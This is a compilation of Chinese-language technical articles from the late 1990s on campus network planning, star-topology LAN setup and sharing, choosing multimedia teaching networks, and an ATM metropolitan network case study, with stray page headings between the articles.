    作为系统集成商当然希望给学校的方案越先进越昂贵越好,但是作为学校必须研究,以后会有什么样的用途,能不能发挥这些设备的潜能,这些设备能不能满足未来发展的需要。但是,目前的校园网系统集成多数是先进的设备的集成,少则几十万,一般几百万,多则几千万。花几百万采用ATM技术建起来的网络,只用来进行文件共享,没有合适的网络软件可运行。

校园网建设的目标应该是：

    建设一个以办公自动化、计算机辅助教学、现代计算机校园文化为核心，以现代网络技术为依托，技术先进、扩展性强、能覆盖全校主要楼宇的校园主干网络，将学校的各种PC机、工作站、终端设备和局域网连接起来，并与有关广域网相连，在网上宣传自己和获取Internet网上的教育资源。形成结构合理、内外沟通的校园计算机网络系统，在此基础上建立能满足教学、科研和管理工作需要的软硬件环境，开发各类信息库和应用系统，为学校各类人员提供充分的网络信息服务。系统总体设计将本着总体规划、分布实施的原则，充分体现系统的技术先进性、高度的安全可靠性，同时具有良好的开放性、可扩展性。本着为学校着想，合理使用建设资金，使系统经济可行。

4、 校园网的总体设计思想：
    校园网不只是涉及技术方面，而是包括网络设施、应用平台、信息资源、专业应用、人员素质等众多成份的综合化以及信息化教学环境系统。因此，在总体上如何筹划、组织网络建设和开发应用的设计思想是校园网建设中的最重要的问题。

     总体设计是校园网建设的总体思路和工程蓝图，是搞好校园网建设的核心任务。进行校园网总体设计，首先是进行对象研究和需求调查，弄清学校的性质、任务和改革发展的特点，对学校的信息化环境进行准确的描述，明确系统建设的需求和条件；其次，在应用需求分析的基础上，确定学校Intranet服务类型，进而确定系统建设的具体目标，包括网络设施、站点设置、开发应用和管理等方面的目标；第三是确定网络拓朴结构和功能，根据应用需求、建设目标和学校主要建筑分布特点，进行系统分析和设计；第四，确定技术设计的原则要求，如在技术选型、布线设计、设备选择、软件配置等方面的标准和要求；第五，规划安排校园网建设的实施步骤。 校园网总体设计方案是否科学，要看其能否满足以下基本要求：

1.整体规划安排。从学校建设的全局和全面工作需要出发，考虑部门的地理分布和通信条件。整体规划网络建设方案，对网络系统的目标、总体结构、服务功能、经费预算、建设步骤等重大问题作出规定。
2.先进性、开放性和标准化相结合。尽量采用符合国际工业标准的、比较成熟的技术，兼顾网络技术的发展方向，选择结构化、可扩充、多用途的网络产品，保证网络在较长时间内不落后。
3.结构合理。在通信网络、资源配置、系统服务和网络管理上有良好的分层设计，使网络结构清晰，便于使用、管理和维护。
4.高效实用。着眼于教学、科研、管理的实际需要，用有限的资金优先解决工作急需的问题。设备易于使用和维护。为科学研究提供先进平台，例如可视化计算，计算机协同作业，虚拟网络，虚拟现实，计算机仿真，远程计算机与数据处理等。
5．支持宽带多媒体业务，例如远程教学、多媒体网络教室、会议电视 6．为学术交流提供良好的环境与CERNET、CHINANET等进行高速互连，快速访问Internet，与国内外同行交流信息、协同工作和展示学校的形象。

5、 校园网建设的整体内容:
    一个完整的校园网建设根据软硬件结合主要包括两个内容：技术方案设计；应用信息系统资源建设。

    技术方案设计主要包括两个方面：结构化布线与设备选择、网络技术选型。
应用信息系统资源建设主要包括：内部信息资源建设、外部信息资源建设等的选择。内部信息资源建设包括校园办公管理系统、多媒体网络教室、多媒体电子图书阅览室、网络多媒体课件制作系统、内部通信信息服务系统、视频点播等。外部信息资源建设包括学校主页、远程教学、Internet信息管理等。

6、 校园网建设的具体内容:
6．1 技术方案设计：
6．1．1结构化布线与设备选择设计：

结构化布线设计应该满足以下目标：
1. 满足大楼各项主要业务的需求，且兼顾未来长远发展
2. 符合当前和长远的信息传输要求
3. 布线系统设计遵从国际（ISO/IEC 11801） 标准和邮电部和建设部标准,布线系统采用国际标准建议的星型拓扑结构
4. 布线系统将支持语音、数据等综合信息（如 ISDN 、 B－ISDN 、 ATM 等）的高质量传输，并适应各种不同类型不同厂商的电脑及网络产品
5. 布线系统的信息出口采用国际标准的RJ45插座，以同一的线路规格和设备接口，使任意信息点都能接插不同类型的终端设备，如电脑、打印机、网络终端、电话机、传真机等，以支持话音、数据、图象等数据信息和多媒体信息的传输
6. 布线系统符合综合业务数据网ISDN的要求，以便与国内国际其它网络互连。

6．1．2 网络技术选型设计：

    校园网网络系统基本可分为校园网络中心、教学子网、办公子网、图书馆子网、宿舍区子网及后勤子网等。

（一） 校园网络中心的设计：

    网络中心设计主要包括主干网络的设计、校园网与Internet的互连、远程访问服务等。

（A）在网络中心的核心是主干网络的设计：

    千兆以太网是近几年发展起来的技术，和快速以太网相比，提供更高更快的传输速度，还有更好的第三层交换能力，能管理更高的带宽，更高的流量。其技术较ATM简单，而且价格合理。由于相应的千兆以太网标准已经出台，目前千兆以太网已是局域网发展的主要方向。

    推荐使用联想新近推出的LS-5608G 智能型8口机箱式千兆以太网交换机作为校园网的中心交换机。该交换机提供8个插槽，可选插8口的10/100 Base-TX、2口的100Base-FX或1口的千兆以太网模块。可选模块如下：

MS-5101 8口10/100Base-TX模块
MS-5102 2口100Base-FX模块
MS-5103 1口千兆位以太网模块（SX/MM/850nm，0-350m）
MS-5104 1口千兆位以太网模块（LX/SM/1310nm,0-6km）

它可适用于大型主干网络，高速率、高端口密度、多端口类型的复杂网络，需要千兆以太网的网络环境等。
我们可以选择MS-5103 1口千兆位以太网模块（SX/MM/850nm，0-350m）或MS-5104 1口千兆位以太网模块（LX/SM/1310nm,0-6km）与下面的各个子网通过千兆位的链路相连。

（B）校园网与Internet的互连：

    推荐采用局域网专线接入方式，此方式需要配备路由器（Router）等设备， 租用电信部门的专线DDN或Frame Relay，也可申请ISDN专线并向CERNET管理部门申请IP地址及注册域名，以专线方式连入Internet，并提供放火墙、计费管理等功能。

    本方案选用联想的LR-2501路由器，具有1个局域网(LAN)口，2个广域网（WAN）口和1个控制台。支持以下协议: 帧中继（Frame-Relay）、X.25、PPP、HDLC。

（C）远程访问服务

    随着日益增长的远程用户（如在家中上网，欲访问校园内部网查找资料的教师及学生）需要，这些用户需要拨号访问校园内部网。他们需要校园网提供远程访问服务。

     联想推出的LA-220和LA-240访问服务器，安装在本地局域网中，通过1个至4个调制解调器（或ISDN TA）和1至4根电话线，为位于任何地方远程访问人员提供拨号访问本地局域网的服务。远程用户只要在当地拥有1个调制解调器和1根电话线，通过拨接LA-220或LA-240上所连接的电话号码，就可以使其计算机登录、访问本地局域网上的资源。

（二）教学子网的设计

    校园网建网的目的之一。是利用计算机网络实现多媒体教学，如：

    交互式多媒体课堂：在网络多媒体教室中，学生查找文本、视频资料，进行主动的学习，老师起到引导和把握方向的作用。

电子阅览室：把各种影视，教学资料存放在视频库中。在阅览室内利用计算机网络观看。

教师培训：教师在办公室内，利用网络观看放在视频库中的教学示范或为备课查看视频资料

多媒体教学的难点在于实现视频信号的传输（如VOD视频点播），其困难之处主要有以下几点：

视频信号数字化后的数据量非常宏大，例如，一幅NTSC标准的24位真彩色图像约占1MB空间，要在计算机上实现全活动的视像，则帧速率为30帧/秒，1秒钟的视频数据占30MB空间，显然。仅依靠现有的存贮技术根本无法实现，更不要说在网络上实时传输。ISO制定了将动态图像进行压缩的MPEG标准，其中MPEG-1把视频和伴音信息压缩到1.2M/B-1.5M/B。另外Intel公司的Indeo Video技术也得到广泛应用，在其产品中，视频信号所占用的带宽小于500K/B。

    以太网使用CSMA/CD介质访问规程。任一工作站要进入网络都必须采用这种带有冲突检测的载波侦听多路访问方式，其结果是，每个数据包传送所需要的时间是不确定的，这种不可预测性使得传送的视频信号不能同步，因而产生噪声和图像失真，为解决这个问题，H.323标准应运而生。它规定所有数据包所占用时间的长度是相同的，这就为在局域网上传送视频创造了条件。

    总之，在局域网上实时传送高质量的视频数据还未成熟，但传送压缩后的视频确是可行的。在教学过程中，大量传送的是文本、图像和部分的视频等数据，对速度要求较高，所以我们推荐所有教学用端口采用100M交换式以太网口，主要端口至少采用100M交换式以太网口。

    在这里，我们推荐联想LS-5625 智能型24+1口10/100M自适应以太网交换机。它提供24个10/100M交换式端口和一个扩展插槽，可选插1个8口的10/100 Base-TX、1个2口的100Base-FX或1个1口的千兆以太网模块。

模块的型号如下：

MS-5101 8口10/100Base-TX模块
MS-5102 2口100Base-FX模块 （多模，1310nm波长，0-2km）
MS-5103 1口千兆位以太网模块（短波/多模/850nm，0-350m）
MS-5104 1口千兆位以太网模块（长波/单模/1310nm,0-6km）

    但实际上大量用户（指超过60个流）的视频传输的瓶颈在于存储介质的外部传输速率，因此可选用多通道的磁盘阵列接多台主机的方式提高访问的总线带宽。

    在教学子网的软件方面，可选用的种类较多，如：联想传奇(ParaSaga)电子教室、海航的电子阅览室，中教的课件制作系统等。传奇(ParaSaga)电子教室v4.0具有丰富的功能，主要分为三大类：教学功能、管理功能和一些辅助功能。

（三）办公子网的设计

    办公子网主要面向学校的各级领导以及各职能部门，为实现学校管理的现代化服务。办公计算机所实现的功能主要是对网络数据的查询、修改、添加、删除等操作。网络数据应该传输得比较快，才能提高办公的效率。同时，办公计算机应该能够达到支持视频传送的要求。

    网络办公管理信息系统包括办公管理、思教管理、教务管理、总务管理、财务报表管理等。

    鉴于办公子网将支持视频功能，推荐采用交换式10/100M端口，部分采用共享式10/100M.

    在此，我们向您隆重推荐联想LH-2627 24+3口10/100M自适应集线器或LH-2613 12+1口10/100M自适应集线器。LH-2627和LH-2613是联想根据中国用户的需求推出的适合国人应用的网络设备。这两款集线器除具备普通双速集线器的功能外，还专门提供了交换式端口。交换式端口能够为连接在该端口上的设备提供独享的10/100M的带宽，极大地提高了数据传输的速率，可用于解决服务器瓶颈，或为连接网络主干提供更大的带宽。

    另外办公子网有共享打印需求，我们提供了联想LP-136 3口10/100M以太网打印服务器，其提供3个标准并口，可连接三台任意标准并口打印机。

    办公子网对应的软件有科利华等公司研制开发的办公软件。

（四）图书馆子网的设计

    图书馆是一个相对独立的系统，其内部可以专门配备一套主机连接光盘塔以及若干查询终端。用于教师及学生对图书及目录通过相应的索引软件进行查找。

    图书馆的其它办公计算机仍然接入校园办公子网。

    图书馆通过100M交换口连入校园网，而各个查询终端可以采用10/100M共享式端口。

    我们推荐联想LS-3016 16口10/100M自适应以太网交换机，它提供了优良的每端口性能价格比，并支持基于端口的VLAN划分。

    图书馆管理系统对应的软件在市场上有较多且成熟的相应产品。

（五）宿舍区子网及后勤子网等的设计

    宿舍区子网即在学生宿舍内部连网，可以直接浏览学校发布的信息及查阅一些电子文档资料。后勤子网覆盖范围较大，主要用途有食堂IC卡计费系统等。

    于宿舍区子网及后勤子网对带宽的要求并不高，因此可选用共享10M/100M的端口。

    联想的LH-2016 16口10/100M自适应集线器提供16个双速集线器端口，能够自动适应所接设备的速度（10/100Mbps），每台LH-2016背面都有2个堆叠口，利用这两个堆叠口最多可堆叠6台集线器，最大可用端口数为96个。

（六）总体简述：

    全体方案设计如下：采用联想的LS-5608G 智能型8口机箱式以太网交换机作为校园网的中心主交换机，其提供了千兆位的交换能力。

    由于校园网是一个园区网，因此网络主干采用光纤，通过中心交换机的千兆模块或快速以太网模块连接到几个主要建筑的二级交换机上。二级交换机我们选用了联想的LS-5625 智能型24+1口10/100M自适应以太网交换机，并选插1个2口的100Base-FX或1个1口的千兆以太网模块向上级联。

    二级交换机LS-5625向下连接LS-3016 16口10/100M自适应以太网交换机、LH-2627 24+3口10/100Mbps自适应集线器、LH-2613 12+1口10/100Mbps自适应集线器、LH-2016 16口10/100Mbps自适应可堆叠集线器、LA-240或LA-220访问服务器和LR-2501路由器，以及LN-1018以太网卡、LN-1068或LN-1068A快速以太网卡。 这样通过联想全系列的网络产品即可构建一个完整、先进、可靠的校园网硬件平台，从而有利于学校校园网信息系统使用和维护，便于它的发展、扩充和升级，保护用户投资.

6．2 信息系统资源建设
6．2．1 内部信息资源建设

    内部信息资源建设可分为以下几个模块：校长查询，学生管理，课程管理，思教管理，教工管理，党务管理，工资管理，财产管理，档案管理，文件管理等。其模块的功能如下：

校长查询模块：创建、修改、删除用户帐号，更改用户权限；对学生管理，课程管理，思教管理，教工管理，党务管理，工资管理，财产管理，档案管理，文件管理所录入的内容进行浏览、查询、统计操作。
学生管理模块：进行新生入学、升班操作、毕业处理操作；维护学生档案，包括学生基本信息、成绩、评语、奖惩、考勤等记录的增、删、改。
课程管理模块：编排课表，并提供冲突校验；选择任意的组合条件查询课表（可选项包括班级名称、星期几、课程名等）。
思教管理模块：提供了文明班评比周表、总表，量化班级评比结果及班主任工作；管理三好学生、共青团员、少先队员及个别生的各项信息。
教工管理模块：管理教工档案，包括教工基本信息、社会关系、职称历史、履历、发表论文情况、参加培训记录等。
党务管理模块：灵活设定支部，管理党员各项信息（包括入党时间、入党地点、介绍人等），党组织活动出勤记录，交纳党费情况及参加党内培训情况。
工资管理模块：工资结构可以按各学校的实际情况自定义；实现自动计税；自动计算工资总额；可选择字体、字号等，方便打印符合用户需要的工资条。
财产管理模块：包括对消耗品帐目、出库单、入库单、固定资产及物品代码的管理。
档案管理模块：分为卷宗信息管理和卷内文件管理。可按期限长短或其他分类方法管理档案信息。
文件管理模块：主要进行收文管理，包括题目、日期、主要内容、文件来处、阅办单位等信息的管理；可按保密等级或其他分类方法管理文件信息。

6．2．2 外部信息资源建设

    外部信息资源建设应包括以下几个功能：Internet功能、远程访问功能、电子邮件功能、以多媒体方式介绍学校的功能、讨论和交流功能、信息发布功能。

    Internet功能、远程访问功能： 在信息时代宣传学校、发布学校的信息,对提供学校的知名度,同时共享教育资源非常有意义。校园网信息平台具有配装Internet功能,只要学校配备了相关的网络设备,申请了线路,那么学校的Internet站点就可开通。除校务处理和个人信息以外,其他均可被Internet用户访问。如果学校还没有条件上Internet,可以安装Modem让用户远程拨号入网。

电子邮件功能：

    校园网信息平台应有功能强大的邮件系统,可以为每个使用者建立自己的信箱,安全保密又极大地方便了通信。许多事务处理均可以通过邮件提醒,高效便利。

以多媒体方式介绍学校：

    校园网信息平台可以让学校以多媒体主页的方式综合介绍学校。这是展示学校风采的最佳手段。

讨论和交流功能：

    校园网信息平台具有讨论的功能,可以允许所有人就一个问题发表自己的意见,而这种讨论的好处在于它可以保留讨论的过程,并且不受时间和空间的限制,如教学研讨、经验交流等均是以讨论的形式出现。

信息发布功能：

    学校有许多信息需要向老师、学生或社会公布,如学校的规章制度、招生信息、教学信息等,它们共同的特点是只许看不能改,校园网信息平台的安全体系应保证这一点。

7、 总结：
    学校的网络化建设必然会对学校的信息化起到巨大的推动作用，为学校的办公提供简单、有效、便捷的理想环境，为学校的教育教学改革迅捷提供有效的数据信息。由于建立了校园网,一方面缩短了学校与外界的距离,利用电子邮件和Internet电话等服务 ,扩大了学校与外界的交流;另一方面,构建了以Intranet为基础的管理信息系统,推动了学校的信息化建设,为学校今后的快速发展准备了条件。随着学校的校园网建设的普及化，学校将会进入一个科学管理和科学教学的新时代。

返回


星型局域网组网指南

《一键清理系统垃圾》

星型局域网组网指南

    引言
    九十年代初SUN公司就提出了著名的“网络就是计算机”的口号，当时对此能深刻理解的人还为数不多，大多数人仅仅把它当作是SUN公司的宣传策略。随着计算机的迅速普及和网络（特点是Internet）的迅猛发展，不但证明了SUN公司的高瞻远瞩，更为这句著名的口号做了最好的演绎。
    对大多数非专业的计算机用户，网络还只是计算机的一个别名，即使对一些专业人士，网络也只是一些抽象的概念。现在单位甚至家庭都拥有一台以上的电脑，如果能把这些电脑以很少的代价互连起来，既能起到共享资源（文件、打印机、Modem、ISDN等）作用，又能节约经费开支。
    一、入门篇
    首先了解一下网络的定义：利用通信设备和线路将地理位置不同的、功能独立的多个计算机系统互联起来，以功能完善的网络软件（即网络通信协议、信息交换方式及网络操作系统等）实现网络中资源共享（Resource Sharing）和信息交换的系统。其实对非专业人士而言，只要知道网络就是用线（双绞线或同轴电缆等）连接数台计算机以达到互相通信和资源共享即可。那么什么是局域网（LAN）呢？按照IEEE的说法，局域网可定义为：“A LAN is a data communication system allowing a number of independent devices to communication directly with each other，within a moderately sized geographics area over a physical communications channel of moderate data rates.”译过来就是：局域网是一个通信系统，它允许数台彼此独立的计算机在适当的区域内，以适当的传输速率直接进行沟通。由上述定义可知，局域网与计算机的种类没有关系，LAN的主要概念是“在适当的区域、以适当的传输速率直接进行沟通”，也就是说LAN上任何两台计算机间应该都是没有界限、可以直接互通信息的。
    从传输距离上看，LAN一般都在同一栋建筑物，甚至只局限于建筑物的同一层或几个房间。从传输速率上看，最通用的以太网（Ethernet）是10Mb/s，也有100Mb/s、1000Mb/s等。从网络拓扑结构看，最常见的有三种：总线型、星型、环型，本文只介绍星型网络结构：这是现在局域网最流行的一种结构，其中心为一个共享式集线器（Hub）或一个智能交换机（Smart Switch），呈星状结构将计算机互连起来（如^06050401a^）。这种结构的最大优点是网络稳定性好，不会因为一台计算机的故障而影响整个网络通信。另外，此种网络结构的可扩充性也很好，要在网络中增加一台电脑，只需用网线将其连入Hub的一个RJ45槽口即可。当然此种结构也有缺点，一旦Hub出现故障，整个网络就会瘫痪。
    下面我们再介绍组建10BaseT（10BaseT中的“10”表示网络的传输速率为10Mbps，“Base”表示基带传输，“T”表示传输介质为双绞线。）局域网所需的硬件：
    计算机：至少一台服务器和若干台工作站。
    网卡：从速度上可分为10M、100M、10/100M自适应三种。从总线分，网卡可分为ISA、PCI两种。ISA网卡属较老的一种，价格虽然便宜，但有容易和其它设备（声卡、显卡、硬盘保护卡）的中断、I/O地址冲突的缺点。PCI网卡不存在这个问题，但价格较贵。对于不太熟悉电脑的用户，推荐使用PCI网卡。
    网线：对于星型网络结构一般采用非屏蔽双绞线，两边接头用RJ45。
    集线器（或交换机）：这是星型网络结构中专用的设备。从接口数上可分为8、16、24口等几种，可根据自己的需要选择。从功能上分，Hub可分为主动式、被动式、智能式三种，可根据对网络通信的要求选择。
    二、实战篇
    1.网卡的安装和配置
    网卡的安装和配置是整个局域网组网过程的第一步，上面已经提到网卡按总线标准可分为：PCI，ISA两种。如果买到的是PCI网卡，一般在安装和设置中，基本上不会出现什么问题，只需按照安装过程中的提示进行即可。如果买到的是ISA网卡，安装过程中可能会碰到一些硬件设备冲突问题，可用随卡带的驱动盘中的设置/诊断程序（文件名可能有几种：“diag”、“modi”、“setup.exe”）来重新设置中断、I/O。例如现在绝大多数网卡都是以UM9008芯片为主控芯片，在驱动盘中有一个名为mod9008.exe的文件，用来设置网卡的工作方式，可将网卡设置为PnP方式或跳线方式。当把网卡改为跳线方式后，必须用另一个名为diag9008的文件来调整网卡的参数（中断、I/O地址等）。一般网卡出厂时，中断被设为3，I/O地址设为300H。
    以上介绍的是在DOS下对网卡的诊断和设置，当网卡插入主板，重新启动计算机后，还必须进行Windows的设置。如果启动机器后，Windows报告检测到新的硬件，可按照其提示进行网卡设置。也可以在启动后在“控制面板”的“网络”选项中选择“添加→适配器”，然后选择厂商和网卡型号，按“确定”后在网络窗口中会显示添加的网卡设备，同时还会安装相应的网络协议和网络客户。双击“网络用户”在出现的对话框中可以选择登录到某个Windows NT的域，以及登录选项。关于Windows NT的有关内容，限于篇幅，本文不作专门介绍。
    最后来看一看在网络对话框中“标识页”的内容，实际上是给你的机器取网上的名字和划分工作组的地方。首先，在“计算机名”中取一个名字，就是你的机器在网上的代号，其他人可以在“网上邻居”中用这个名字访问你的机器；其次，还要决定你的机器在哪个工作组中，在同一局域网中工作组的名字必须相同。在“访问控制”中，如果是NT的用户，选择“用户级访问控制”；如果非NT用户，选择“共享级访问控制”。
    2.非屏蔽双绞网线制作
    网卡安装/配置好后，接下来就是制作网线了。首先，用压线钳上的剥线刀在距网线顶部2厘米处绕线割一圈，将绝缘线剥下，露出四对双绞线。四对双绞线中的每条芯线都标有特别的颜色，而且这些颜色有公认的规定（最常用的规格为EIA/TIA 568B）。对调第3、5两根线后，从左至右依次为“白橙”、“橙”、“白绿”、“蓝”、“白蓝”、“绿”、“白棕”、“棕”。然后将网线剪齐并插入到RJ45接头中，注意一定要插到底。接下来就是将RJ45接头插入压线钳中的压接槽中，把压线钳使劲压一下即可。网线的另一头可以依法制作。另外，在购买双绞线时一定要分清是哪类线（见^06050401b^表一）；网线侧RJ45（“公头”，8槽）不要与RJ11（电话线接头，6槽）混淆，RJ45各脚功能见^06050401c^表二，集线器端的RJ45（“母头”）各脚功能正好相反，即传输改为接收，接收改为传输。
    网线做好后，将网线的一头插入需要入网机器网卡的RJ45中，另一头插入集线器（Hub）中，然后可以试着在各自的“网上邻居”中查找对方的机器名（也就是在“标识页”中所起的计算机名）。如果能看到别人的机器就说明网络通讯成功，局域网组网到此结束，下面将说明局域网如何实现资源共享和Internet上网共享。
    三、应用篇
    1.文件共享
    这是网上资源共享最常用的方式，可以通过下列途径实现资源共享：点击桌面图标“我的电脑”选择你要共享的驱动器或者目录，然后在上面点击右键，选择菜单中的“共享”选项，在出现的对话框中输入共享名，可以使用缺省名称，也可以自己随便起一个。访问类型有三种：“只读”、“完全”、“根据口令访问”，根据自己的需要进行选择。设置完成后再打开“我的电脑”，如果看到盘符前出现一双“奉献之手”，就说明共享成功。这时，有两种方法实现资源共享，一是直接在“网上邻居”上双击你要使用的资源共享名称；另一种是在你使用的资源共享的名称上点击右键，在弹出的菜单中，选择“映射网络驱动器”，然后在打开的对话框中选择你想要给该共享资源分配的“驱动器”盘符（默认的是你机器上最大盘符的下一个，如你的光驱是F盘，则默认盘符为G），单击“确定”按钮，然后在“我的电脑”中会多出一个盘。使用这个盘的条件是这个盘的“宿主”必须开机并且登录到局域网上。
    2.打印机共享
    打开“我的电脑”，双击“打印机”，选择“添加打印机”，按“下一步”，选择“网络打印机”，再按“下一步”，在“网络路径或队列名”编辑框中填入相应的内容。比如我单位一台Workstation的电脑上，连有一台HP激光打印机，那么编辑框中就应填入“\\workstation\hp”。然后选择正确的打印驱动程序，安装后就可实现打印机共享。
    3.Internet资源共享
    Internet上网共享的含义就是在局域网中拨号上网，或通过ISDN上网，其他局域网中的机器都可以共享该机器的拨号连接。共享上网只需在所有的上网机器中安装TCP/IP协议和在那台拨号上网的机器上安装一个特定的软件，即可实现。这个特定的软件可分为两种，一种是通过Proxy Server（代理服务器）实现共享的WinGate；另一种是通过网关实现共享的SyGate。这两个软件可到下列网址下载：http://www.sygate.com，http://www.wingate.com。关于这两个软件的设置涉及到一些专业知识，一般用户不需了解，本文也就不作介绍。对此感兴趣的读者可到这两个软件公司的网址去查阅，或参阅相关书籍。
    最后就该配置局域网中其他要共享上网机器的TCP/IP协议。在桌面的“网上邻居”图标上按鼠标右键，再按“属性”按钮，打开网络对话框，双击“TCP/IP→网卡的型号”，出现“TCP/IP属性”对话框。以我单位校园网为例来说明该属性对话框选项的填法，“IP地址”栏填写：202.121.153.4（根据自己申请的IP地址填）：“子网掩码”栏填入255.255.255.0；“网关”栏填入：202.121.153.1；“WINS配置”填入：202.121.154.5、202.121.154.2；“DNS配置”：主机填入Jzhang，域名填入shiep.net.cn；DNS服务器搜索顺序填入202.121.154.5、202.121.154.2。网络共享设置就这些了，现在可以重新启动机器，然后就可以试着拨号上网浏览了。如果是通过Proxy Server上网，还需下载MS Proxy Server 2.0代理服务器软件，可到微软公司Proxy Server站点下载。使用代理服务器有两个好处：一是可利用其大容量的缓存提高上网速度，二是可以起防火墙作用。Proxy Server的设置和管理较为复杂，已经超出了本文的范围。其实，网络是个实践性很强的东西，必须亲自动手组建一次，才会对网络的一些要领有更加深入的理解。另外，组网过程中会遇到很多小问题，有些在本文中已涉及，还有一些需要读者自己解决，相信聪明的读者是不会被这些小问题难住的。


选择适合的多媒体教学网

《一键清理系统垃圾》

选择适合的多媒体教学网

现在，学校配备多媒体教室已是大势所趋，但是由于多媒体教学网络较多，如TOP98、HiClassⅡ、WinSchool、NewClass、LanStar、北大辅教、新纪元、联想电子教室等，它们的性能、效果、价格等各有差异。面对如此多的多媒体教学网，我们应如何选择合适的多媒体教学网络呢？在此，将个人的一些看法提供给大家，以供同行选择多媒体教室时参考。

多媒体教学网的分类

一、从结构上分类

1.纯软件版：如：LanStar 5.0 for Netware。这种教学网需建立在局域网之上，然后再加上一套软件即可实现，无须其它任何硬件。

优点：

①系统成本较低，如有现成局域网，则只需一套软件。

②由于是一套软件，所以在安装、调试、维护、升级等都十分方便。

③是多媒体教学网的发展趋势，随着计算机软硬件及网络的发展，相信硬件版的多媒体教学网，将会和解压卡、防病毒卡、汉卡一样最终被软件所取代。

缺点：

① 由于软件版要依附于局域网，首先要保证局域网的正常运行。

②要使音视频传输达到实时传送，对计算机的硬件配置要求比较高。

2.软硬结合版：如新纪元。这种教学网，要在每台微机上安装一套多媒体影音传输设备，再用视音频传输线连接起来，最后再加上一套控制软件即可。

优点：

①由于此种教学网单独采用了一套影音传输设备，所以能够实现声音、图像的实时传送，效果良好。

②升级较方便。

缺点：

① 系统成本较高。

② 安装、调试、维护稍复杂。

3.纯硬件版：如HiClassⅡ。这种教学网和软硬结合版类似，也要在每台微机上安装一套多媒体影音传输设备，并用音视频传输线连接起来，最后只是把控制软件换成了控制面板。

优点：

①由于此种教学网也单独采用了一套影音传输设备，所以能够实现声音、图像的实时传送，效果良好。

②此类教学网将控制软件换成了控制面板，所以更直观形象，操作更加容易、简单，使得非计算机专业的老师更加容易掌握操作过程。

缺点：

①由于采用了纯硬件设备，所以和软硬结合版相比，价格稍高，安装、调试、维护更复杂。

②升级稍困难，需更换硬件。

二、从实现的方式上分类

1.基于数据网的：这种教学网必须建立在计算机的网络之上，纯软件版和软硬结合版大多属此类。

优点：

①网络之间的连接较简单，系统各功能的实现较容易，造价较低。

②由于有计算机网络，所以便于学生了解、学习局域网知识，同时可以实现资源共享，减少机房软件维护方面的工作量。

缺点：

①必须建立在计算机网络之上，如无网络，则须另加一套计算机网络。

②在使用教学网时，只有局域网正常运行后，多媒体教学网才能正常使用（如是星型网络，一台微机出故障或上不了网，则这台微机就无法实现影音的传输。如是总线型网络，一台微机出现故障，则局域网不能正常运行，那么多媒体教学网也就无法使用）。

2.不基于网络的：这种多媒体教学网，无须计算机网络，纯硬件版及软硬结合版有部分属于此类。

优点：

不需要网络支持，有无网络都可以。

缺点：

由于没有利用网络，一部分功能需靠硬件来实现，造成系统复杂，造价较高，安装、调试、维护较复杂。

选择适合的多媒体教学网

1. 从系统的性能上来选择，多媒体网络一般应具有如下基本功能：

①教学演示：教师将本机的屏幕画面和声音实时转播给所有学生或部分学生，进行教学演示。

②屏幕监视和语音监听：教师可对指定学生或全体学生的屏幕画面和声音进行监视或监听。

③屏幕及语音转播：可将任何学生的屏幕画面及声音转播给其他部分学生或全体学生，同时教师可以插入指导。

④远程遥控、个别辅导：教师可利用自己的键盘和鼠标对学生做远程遥控，辅导学生完成其操作。

⑤双向对讲、分组讨论：教师与选定的群组学生之间进行多人语言交流。

⑥课堂点名：在线扫描学生出勤和学生上网情况。

⑦电子举手：学生可随时利用热键举手、向教师提问。

⑧警告：教师在必要时可以对全部、部分或个别学生发出警告。

⑨联机考试。

有些多媒体网还有其他一些功能，比如：远程启动功能，教师可对任一或全体学生实施热启动；锁键功能，教师可锁定所有学生的键盘以利正常的教学秩序。我觉得这两种功能在教学时有时候很有必要。

2. 从教学需求上进行选择，如果用计算机来教授计算机学科及辅助其它学科的学习，那么用纯软件版的即可实现；如果还想连接摄像头、视频展示台、VCD、放像机及卫星教学节目等，使视频音频达到实时传送，需选择软硬结合或纯硬件版。

3. 由于计算机软硬件发展速度非常快，所以要考虑到多媒体网的升级问题，请不要忽视这一点。

4. 由于计算机网络的飞速发展，网络教学也不可忽视，学校计算机联网已势在必行，在建设多媒体网时最好能同时加上局域网，同时也要考虑此种多媒体网是否能够接入Internet，以适应未来的教育。

5. 从现有的计算计资源来选择，如计算机档次较低，最好选择软硬结合版或纯硬件版，另外，有些多媒体网为了便于控制，需要另加一台控制机，如Top98；而有些则不需要，如纯硬件版的HiClassⅡ。

6.从经费上来选择，有些学校的经费较紧张，可以考虑选用纯软件版；如果经费较充足，最好选择软硬结合版或纯硬件版。

最后再提醒大家，在选择多媒体教学网时不能仓促下结论，最好要实地考察，亲自看一看性能效果到底如何，比如在图形状态下图像的传输质量，要多比较几家，另外可以打听一下同行现有的多媒体网使用情况；同时要选择可靠的商家，以保证以后的升级、维护。

返回


一个ATM城域网的设计与应用实例

《一键清理系统垃圾》

一个ATM城域网的设计与应用实例

    随着ATM技术的成熟和其价格的日趋合理，国内成功的ATM案例已屡见不鲜。作为一个中型规模的网络用户单位，我们于1997年底开始进行网络选型，1998年8月在一个方圆近7公里的范围内建成了一个主干带宽为155Mb/s的ATM内部城域网。全网共配备了ATM网络设备近20台，UNIX服务器、NT服务器及视频点播服务器近40台。整个系统建设本着采用信息技术的最新成果、前沿技术和实用可靠的宗旨，建立了Intranet应用环境，先后开辟了内部网的Web服务、视频会议、全网视频点播服务、E-mail服务、网上办公发文、情报资料库全文检索、单点服务器的远程拨号接入，至今网络的使用已取得良好的效果。

    一、网络设计:

    通过对实际应用需求的分析，在网络设计时，我们主要论证了网络的体系结构、高可靠性问题、高安全性问题、可管理性问题、全网多媒体应用等问题。在网络方案设计上主要有以下特点：
    1.采用星型拓扑结构，网络主干采用ATM技术，提供155Mb/s（以下Mb/s简称M）主干带宽，桌面采用以太交换技术；
    2.采用快速的局域网络技术，如：ATM、Fast Ethernet、Ethernet Switch等；
    3.服务器直接连接ATM交换机或者100M快速以太网交换端口，工作站连接10M以太网交换端口，视频站点连接25M ATM端口或者10M以太网交换端口；
    4.为提高网络的安全性和可靠性，能够根据需求对网络进行虚拟网的划分；进行冗余可靠性设计；对网络的安全性进行考虑。
    考虑用户单位的物理位置的分布和应用特点以及网络设计中网络拓扑的清晰、数据流向的层次性和易于网络管理等多方面因素，我们采用星形网络结构。各业务部门通过ATM/LAN交换机，采用155M ATM线路连接到中心交换机，这样各业务部门之间的数据交换必须通过中心交换机进行数据交换，易于设置防火墙，而且数据流向清晰。采用星形结构，如果某一业务部门的ATM/LAN交换机发生故障，不会对全网其他部门之间的数据互通造成影响。
